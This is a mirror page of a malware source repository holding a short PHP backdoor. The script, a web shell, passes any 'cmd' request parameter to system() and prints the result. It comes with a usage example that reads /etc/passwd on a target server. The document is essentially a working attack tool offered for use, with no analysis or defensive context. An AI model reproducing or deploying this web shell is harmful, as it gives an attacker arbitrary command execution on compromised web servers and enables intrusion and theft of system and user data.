mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
18 lines
345 B
Plaintext
18 lines
345 B
Plaintext
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
|
|
|
|
<?php
|
|
|
|
if(isset($_REQUEST['cmd'])){
|
|
echo "<pre>";
|
|
$cmd = ($_REQUEST['cmd']);
|
|
system($cmd);
|
|
echo "</pre>";
|
|
die;
|
|
}
|
|
|
|
?>
|
|
|
|
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
|
|
|
|
<!-- http://michaeldaw.org 2006 -->
|